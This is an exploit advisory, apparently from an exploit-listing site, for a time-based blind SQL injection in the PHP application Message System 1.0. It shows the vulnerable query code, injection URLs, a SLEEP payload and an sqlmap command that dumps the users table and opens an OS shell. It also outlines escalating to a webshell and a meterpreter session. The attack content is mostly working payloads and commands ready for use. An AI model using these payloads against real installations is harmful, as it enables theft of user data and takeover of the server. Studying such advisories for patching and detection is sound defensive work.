Message System 1.0 SQL Injection

2022.03.31
Credit: Hejap Zairy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title: Message System 1.0 1.0 Blind Time SQLi To Rce # Author: Hejap Zairy # Date: 30.07.2022 # Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html # Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : https://0day.gov//pmms/?page=view_message&id=1 # 2 - manual inject Blind SQli Payload: https://0day.gov/pmms/?page=view_message&id=1' OR NOT 515=515#&password=hejap&button=Login # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ``` <?php $qry = $conn->query("SELECT * FROM `conversation_list` where id = '{$_GET['id']}' and (`user_1` = '{$_settings->userdata('id')}' or `user_2` = '{$_settings->userdata('id')}') "); if($qry->num_rows > 0){ foreach($qry->fetch_array() as $k => $v){ if(!is_numeric($k)) $$k = $v; } $msg = $conn->query("SELECT m.*,CONCAT(u.firstname,' ', COALESCE(u.middlename,''), ' ', u.lastname) as `name`, u.username, u.avatar FROM `message_list` m inner join users u on m.from_user = u.id where m.conversation_id = '{$id}' order by unix_timestamp(m.date_updated) asc limit 1 ")->fetch_array(); $conn->query("UPDATE `message_list` set `status` = 1 where conversation_id = '{$id}' and to_user = '{$_settings->userdata('id')}'"); } else{ echo "<script>alert('ID is unknown or you dont have access to view the Message.'); location.replace('./?page=inbox');</script>"; } ?> ``` --- #Status: CRITICAL [+] Payload GET --- GET /pmms/?page=view_message&id=1 HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fcmu4ss9vhq6760poojbtk40bt Upgrade-Insecure-Requests: 1 --- ``` --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=view_message&id=1' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))sFek) AND 'MXDw'='MXDw --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D pmms_db -T users --dump --eta --technique=t --hex --os-shell # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/HfDGPGT.png https://i.imgur.com/6RH1Wvi.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top